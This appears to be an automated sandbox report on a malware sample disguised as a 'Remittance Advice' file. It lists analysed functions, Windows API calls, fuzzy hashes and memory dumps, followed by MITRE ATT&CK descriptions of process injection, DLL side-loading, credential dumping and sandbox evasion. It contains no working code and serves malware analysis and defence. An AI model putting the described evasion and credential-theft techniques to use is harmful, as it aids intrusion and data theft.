Opcode ID: b05936f2beb5d4d8983bb4446f8d0e7b71bfc90d3b68fd473d6c289a4149520d
Instruction ID: 19a1f201901a9fcfcec871947eaeb9c4881874811fdaf4437ad3dabcddf9bf05
Opcode Fuzzy Hash: b05936f2beb5d4d8983bb4446f8d0e7b71bfc90d3b68fd473d6c289a4149520d
Instruction Fuzzy Hash: 746179B0A013498FDB14DFA9D548BDEBBF1FF88304F248459E419AB360DB34A945CB66

Function 030ED540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030ED5BE
GetCurrentThread.KERNEL32 ref: 030ED5FB
GetCurrentProcess.KERNEL32 ref: 030ED638
GetCurrentThreadId.KERNEL32 ref: 030ED691

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a9c9f658771af5c1af347be371b523910afa88ae53952499693a565e2251a07b
Instruction ID: 0865aceec37ba3090fdd05275e4a0ebdc81fbaac82810bdfff62e431bb0a0b66
Opcode Fuzzy Hash: a9c9f658771af5c1af347be371b523910afa88ae53952499693a565e2251a07b
Instruction Fuzzy Hash: F85178B09013098FEB14DFAAD548B9EBBF1EF88314F248459E418A7390DB745945CF65

Function 030EB298 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030EB4FE

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 56385e1a10f9a1aa0fb50e608c1bd7371903764d54741e7279d8912cb844e857
Instruction ID: 32cb3ac7466e6bd2ab3a66b0f608cd52440552ce52a0f990c2aec65b3949ae4c
Opcode Fuzzy Hash: 56385e1a10f9a1aa0fb50e608c1bd7371903764d54741e7279d8912cb844e857
Instruction Fuzzy Hash: B58155B0A05B058FDB64DF3AD44179ABBF2FF88200F04892ED09ADBA50D775E845CB95

Function 030E590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030E59C9

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6e5b2211dcf558c1b403a17537376012b8099560c39278a2ec701df26974d3dd
Instruction ID: b06cc1c7a69389bd658ac36046503f3e0ef398391a9fcfee1ed761fc578a8b41
Opcode Fuzzy Hash: 6e5b2211dcf558c1b403a17537376012b8099560c39278a2ec701df26974d3dd
Instruction Fuzzy Hash: 36410FB1D01729CFEB24CFA9C8847CDBBB1BF49314F24846AD118AB251DB756946CF90

Function 030E449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030E59C9

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 251bdb82155bf40bd0bb4188f5dd5e442fe709402291f013f229207b28a4f51d
Instruction ID: 9134ff268f49cf7e9a01ddef087baef6239d6a5ffcc25228cb07f1306e832499
Opcode Fuzzy Hash: 251bdb82155bf40bd0bb4188f5dd5e442fe709402291f013f229207b28a4f51d
Instruction Fuzzy Hash: AA41F0B1D01719CFEB24CFA9C88478DBBF1BF49304F24846AD508AB251DBB56946CF90

Function 075411A8 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 60b54e90b8648cc6e1a380492e382f65454c73584d6d4d28ddb009821269f4e7
Instruction ID: ea3fd1ecc85be1f79d077a7118c5f31b22944ba3d5f5d334268157314dd67fde
Opcode Fuzzy Hash: 60b54e90b8648cc6e1a380492e382f65454c73584d6d4d28ddb009821269f4e7
Instruction Fuzzy Hash: B4217AB1D002298FDB10DFAAC884BEEBBF4FB48320F14842AD454A7240D774A945CFA5

Function 07541FC0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 07542052

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 2c4da24eade3b85fe97bc66cc934cccc14f86c13085c1372c48c6da38cf30441
Instruction ID: 2e4702848427abd1ea62134dbf59f70928ccef5369a01a86e8094c2d1e728401
Opcode Fuzzy Hash: 2c4da24eade3b85fe97bc66cc934cccc14f86c13085c1372c48c6da38cf30441
Instruction Fuzzy Hash: 312163B590025A8FDB10DFA9C885BDEBBF0FB08314F10856AD418AB301C334A845CFA5

Function 07541FD0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 07542052

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a8ad4a78bc14c963cacfcaf22a1d3019e476b4422693dc22b1ec0afcb4d61968
Instruction ID: f11677b91a9997f887f8d9112501a0d4c3a5c4ff15e669bcc4eae701811a9c33
Opcode Fuzzy Hash: a8ad4a78bc14c963cacfcaf22a1d3019e476b4422693dc22b1ec0afcb4d61968
Instruction Fuzzy Hash: D72133B490025A8FDB10DFAAC884BDEFBF5FB48314F108569D418AB311D774A945CFA5

Function 030ED788 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030ED80F

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2c1efac7f4d85808d3f4814affd26f0facc329df4b3a19a60127927a85a117df
Instruction ID: 7bd95bcc48929b93b0aecdb958ccd3465b7a48a6092647070ac8296aae4417f5
Opcode Fuzzy Hash: 2c1efac7f4d85808d3f4814affd26f0facc329df4b3a19a60127927a85a117df
Instruction Fuzzy Hash: C221E4B5D012089FDB10CF9AD984ADEFBF4FB48320F14801AE918A3350D374A945CFA0

Function 0754114C Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: e276055a1dffd97afa789bf7fcb0d17fb5638a577691848cdfab5f2c96c9aa1a
Instruction ID: e988ea910fb2aefe8ed8969e3b2406fbacc2962d6fefb6313b39268278a42969
Opcode Fuzzy Hash: e276055a1dffd97afa789bf7fcb0d17fb5638a577691848cdfab5f2c96c9aa1a
Instruction Fuzzy Hash: AE213BB1D002198FDB14DF9AC844BEEFBF5FB88310F14842AE518A3650D774A945CFA5

Function 030ED780 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030ED80F

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 06c580fe5947a4b636a7b63a2dac01e8844c9375b341a1885c354316b9375196
Instruction ID: 0a7c29c3c5dabe2348414fe762d324322e3eef6b234787bddef9f679d9c6ef37
Opcode Fuzzy Hash: 06c580fe5947a4b636a7b63a2dac01e8844c9375b341a1885c354316b9375196
Instruction Fuzzy Hash: 3D21E4B5D013089FDB10CFA9D585ADEBBF4FB48320F14842AE918A3350D378A945CFA1

Function 075420B8 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 089b3af11548635bddb67c999b18db052227fb996a3ef03cb0b9eff0f59fd8b0
Instruction ID: 5f8323a419128a1cec06295af1186fcc65cf49911d5f21a2cc2364754ecda12f
Opcode Fuzzy Hash: 089b3af11548635bddb67c999b18db052227fb996a3ef03cb0b9eff0f59fd8b0
Instruction Fuzzy Hash: 9E2129B1D002198FDB14DF9AC844BEEFBF5FB88320F14842AD558A3650D778A945CFA5

Function 030EB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030EB4FE

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8275726d40c59e1da6558973a9a5206a0c69e9e3a1084a7558147cf76cf7692f
Instruction ID: a32e593e777ad1a65624cd301521295aa85bdaddee376c2361b20bc6d7104abb
Opcode Fuzzy Hash: 8275726d40c59e1da6558973a9a5206a0c69e9e3a1084a7558147cf76cf7692f
Instruction Fuzzy Hash: 47110FB6D003498FCB20DF9AC444B9EFBF4EB88324F14842AD428A7610D379A545CFA1

Function 07541428 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 07541485

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c3d6949442aff8bdc7fffe617d3ddec532528ff80cdea6be0b16b42ee08fb3a5
Instruction ID: 02dd23eaf2fa353dc6b82789118b468dcb650c41b87f5251b840031ffa0f53c2
Opcode Fuzzy Hash: c3d6949442aff8bdc7fffe617d3ddec532528ff80cdea6be0b16b42ee08fb3a5
Instruction Fuzzy Hash: 1F1112B5C003498FDB20DFAAC485BDEBBF4EB48324F20881AD558A3300D779A945CFA5

Function 07541430 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 07541485

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0b44b6a013bcb478362f94304003d60da3e3eb7d0541f7a75fc2ef92b84ea423
Instruction ID: e95f141b0f6f2c107de4b67524879c6cc3260fb0c66e81c86c49896838673697
Opcode Fuzzy Hash: 0b44b6a013bcb478362f94304003d60da3e3eb7d0541f7a75fc2ef92b84ea423
Instruction Fuzzy Hash: E11120B5C003498FCB20DFAAC485BDEFBF8EB48324F20841AD518A3200D779A944CFA5

Function 016AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452074881.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_Remittance Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a31852d1d58d872569ed25576413182df40492277f61067f18564877960faec
Instruction ID: 1ad4d346a11c8df55114807f4dd884eb0257c59393909fa7b17ec3e3df2831a0
Opcode Fuzzy Hash: 0a31852d1d58d872569ed25576413182df40492277f61067f18564877960faec
Instruction Fuzzy Hash: A6210071684200DFDB15DF64D984B16BBA1EB88314F60C56DD84A4B786C336D847CE62

Function 016AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452074881.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_Remittance Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9685453b121f7c5a95ddacb3af40da0ec74c611a331676ce11f548b2f69f8d7
Instruction ID: 2151be4b83814f0fe147a66a10a4fb9e2a77d5d8280251ccb9126f55957f2aec
Opcode Fuzzy Hash: c9685453b121f7c5a95ddacb3af40da0ec74c611a331676ce11f548b2f69f8d7
Instruction Fuzzy Hash: B52192755483809FCB03CF54D994B11BF71EB46314F28C5DAD8498F6A7C33A9846CB62

Non-executed Functions

Function 030EE084 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4325fba985061fb62dab4496305144bd1efd70dda44e810f7bc13b3436be296e
Instruction ID: ec65c7656ef61f966e13dd9a814810909fed00b03fe535dd7cd47bdb1bb9c313
Opcode Fuzzy Hash: 4325fba985061fb62dab4496305144bd1efd70dda44e810f7bc13b3436be296e
Instruction Fuzzy Hash: A3A16D36F0121A8FCF09DFB4C9445DEB7B2FF84300B1985AAE805AB265DB31E955CB40

Analysis Process: RegAsm.exePID: 7068, Parent PID: 4664COMMON

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27.5%
Total number of Nodes:	40
Total number of Limit Nodes:	6

Executed Functions

Function 009EC168 Relevance: 2.0, APIs: 1, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d410c9341f72570a255d505eb3058ef159d02dd5eba9347f909703ee31b8067
Instruction ID: bb12b363b1e6629c0c0b42e4579ccf090a00b5a35f78883fc49d32c596060ab6
Opcode Fuzzy Hash: 0d410c9341f72570a255d505eb3058ef159d02dd5eba9347f909703ee31b8067
Instruction Fuzzy Hash: 8F224BB4E00259CFDB15DFA9C884B9DBBB2BF88304F1081A9D459AB391DB359D86CF50

Function 009E4F08 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4297c62d6529435b72dc75a28ce97f49e36bb91de97852dd1c27a4d8815bb5f
Instruction ID: 2d5e9edcad1d3c3c0cb784e7ccc7eb919ba27f90856ecbf38de09aa248dfbf64
Opcode Fuzzy Hash: f4297c62d6529435b72dc75a28ce97f49e36bb91de97852dd1c27a4d8815bb5f
Instruction Fuzzy Hash: 84C19174E00218CFDB55DFA5D944B9DBBB2FB88301F2080A9E809A7355EB359E86DF50

Function 009E5367 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b067c57a3b27f74eaa5568c4d606e6f99aaad8725974bbfc18f4d5e44e17006
Instruction ID: d0570ca9c5010e659c372006a6c45b039da866778a4272bf10bc20c23cf7f645
Opcode Fuzzy Hash: 1b067c57a3b27f74eaa5568c4d606e6f99aaad8725974bbfc18f4d5e44e17006
Instruction Fuzzy Hash: 51A1F670D00608CFEB14DFA9C944B9DBBB1FF88315F248269E409AB2A1EB759D85CF54

Function 009E56AF Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 696c9780775fefdf0f4adbccd26244ba942a1c195cda6c5700542655672f668b
Instruction ID: cb46751d0044dd6ac0279606246ae26450b8fe891bef91ecd14a3e0b97d2befd
Opcode Fuzzy Hash: 696c9780775fefdf0f4adbccd26244ba942a1c195cda6c5700542655672f668b
Instruction Fuzzy Hash: B1910270D00618CFDB10DFA9C988B9CBBB1FF48315F208259E409AB2A1EB759D85CF54

Function 009EC76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 009EC8AE

Memory Dump Source

Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 664c4b2eab8a1e54373d5db80875f05ee7daa9d43cd3400c047b839ff1edd877
Instruction ID: 7ca3a27a877fb53b509d5f53fd3a00767be150878a81b964a9ac366265839271
Opcode Fuzzy Hash: 664c4b2eab8a1e54373d5db80875f05ee7daa9d43cd3400c047b839ff1edd877
Instruction Fuzzy Hash: 10116AB5E002499FDB05DBAAD984EADBBB5FF88305F648125E884E7342D734DC42CB60

Function 0092D006 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3925123045.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_92d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125579cde04593f25206a17ee857fe584dc53a9a43dc1bf6df5dfb914577730f
Instruction ID: 58d5de7cb0d08cb48ee5527f930c4648714bda89c8f835875ec607d9150a6eab
Opcode Fuzzy Hash: 125579cde04593f25206a17ee857fe584dc53a9a43dc1bf6df5dfb914577730f
Instruction Fuzzy Hash: FE318B7554E3C48FCB038B24D990701BF71AB46214F29C5DBC8888F2A7C23A980ACB62

Function 0092D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3925123045.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_92d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef0040186c78699f18685a90eb99611a78c04f098310dfb1f6d68d7183e826a
Instruction ID: 4c8ba77128b05a6eeddfd10392f05d6203ebca9b7b27d15c31269c94ce61f2ac
Opcode Fuzzy Hash: 5ef0040186c78699f18685a90eb99611a78c04f098310dfb1f6d68d7183e826a
Instruction Fuzzy Hash: C7213471649300DFDB14DF10E9C0B26BBA5FB84314F34CA6DD8494B26AC33AD847CA62

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

